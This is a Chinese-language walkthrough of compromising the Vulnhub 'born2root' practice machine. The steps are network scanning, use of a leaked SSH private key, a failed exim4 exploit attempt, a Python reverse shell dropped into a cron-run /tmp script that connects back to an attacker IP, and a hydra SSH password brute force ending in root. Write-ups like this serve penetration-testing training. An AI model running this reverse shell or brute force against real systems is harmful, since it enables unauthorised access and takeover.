Vulnhub靶机--born2root

0x00 项目地址

https://download.vulnhub.com/born2root/born2root.ova

0x01 靶机渗透

主机发现

arp-scan -l
nmap 192.168.0.103 -sV

发现与其他不同的是靶机开启了111端口，使用命令searchsploit rpcbind查看是否有对应版本的脚本，没有对应版本，那么应该不是这个端口的问题

访问靶机网页，发现了三个角色以及其中一个角色的联系方式

打开御剑进行目录遍历，发现了一个目录泄露在/icons

访问该网页发现了一个rsa私钥，刚进入网页时得到了一个用户名@网络地址格式，是在暗示我们登陆这个用户，所以输入命令wget http://靶机IP/icons/VDSoyuAXiO.txt将该文件下载

为使用该文件登陆martin用户，需要先给文件读写授权再使用ssh连接

chmod 600 VDSoyuAXiO.txt
ssh [email protected] -i VDSoyuAXiO.txt

登陆成功后使用cat /etc/passwd发现了martinhadijimmy三个用户，在使用命令find / -perm -u=s -type f 2>/dev/null查看具有su权限的程序，发现了exim4可以利用

使用/user/sbin/exim4 --version查看其对应版本，再输入命令searchsploit exim寻找对应脚本

使用nc命令将脚本传到靶机

输入命令chmod 777 46996.sh进行所有权授权，然后再输入./46996.sh -m netcat执行，但是发现该靶机禁止一切用户打开任何端口，所有导致脚本运行失败

那么我们再输入cat /etc/crontab查看定时任务，发现用户jimny会每隔五分钟执行/tmp/sekurity.py文件

构造sekurity.py文件内容，输入

import os,socket,subprocess

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.149',4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/bash','-i'])

任何使用nc命令传输到/tmp文件夹下

原终端输入nc -lvvp 4444等待五分钟后连接

但是jimmy也没有root权限，那么最后一个用户habi只能使用暴力破解ssh登录了，在http://tools.hackxc.cc/cai/获得密码本

任何使用命令hydra -l hadi -P passwd.txt ssh://192.168.0.103 -v 进行爆破，获得密码为hadi123

登录发现该用户直接使用其密码获得root权限